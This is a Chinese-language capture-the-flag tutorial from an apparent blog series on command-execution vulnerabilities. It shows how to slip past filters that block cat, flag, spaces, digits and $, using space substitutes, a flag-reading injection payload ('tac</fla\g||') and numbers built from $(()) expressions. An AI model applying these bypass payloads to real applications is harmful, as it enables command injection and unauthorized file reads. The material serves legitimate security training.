@TOC
🍀预计时间:25分钟
学习目标:
1继续了解如何绕过过滤
2学会构造数字
⚠别看今天目标少,内容需要思考滴!!!
过滤cat,flag,空格,数字,$
承接上文,我们介绍了如何绕过过滤cat,flag等,可是如果同时过滤了空格和$我们该怎么办呢???
明显,$IFS我们用不了了,所以这里再介绍几个绕过空格的方法:
==$IFS==
==$IFS$1==
==${IFS}==
=={,}:例如{cat,/flag}==
==<==
==<>==这道题我们使用<来作答
传参tac</fla\g||就可以得到flag了!!!
构造数字(这个比较难搞,所以重点介绍下)
==在linux shell中 $(()) 用来计算数学表达式==
例如:
echo $(()) 0
echo $((~$(()))) -1
echo $((~$(())))$((~$(())))$((~$(()))) -1-1-1
echo $((~$(($((~$(())))$((~$(())))$((~$(()))))))) 2
echo $(($((~$(())))$((~$(())))$((~$(()))))) -3
有没有发现规律???
很明显,如果括号内不加表达式就是0,取反就是-1,我们可以把它们拼接在一起(-1-1-1),也可以加在一起(-3)
🏆🏆结束语:
==命令执行漏洞的内容会不定期更新,如果对您有帮助的话可以订阅一下专栏==
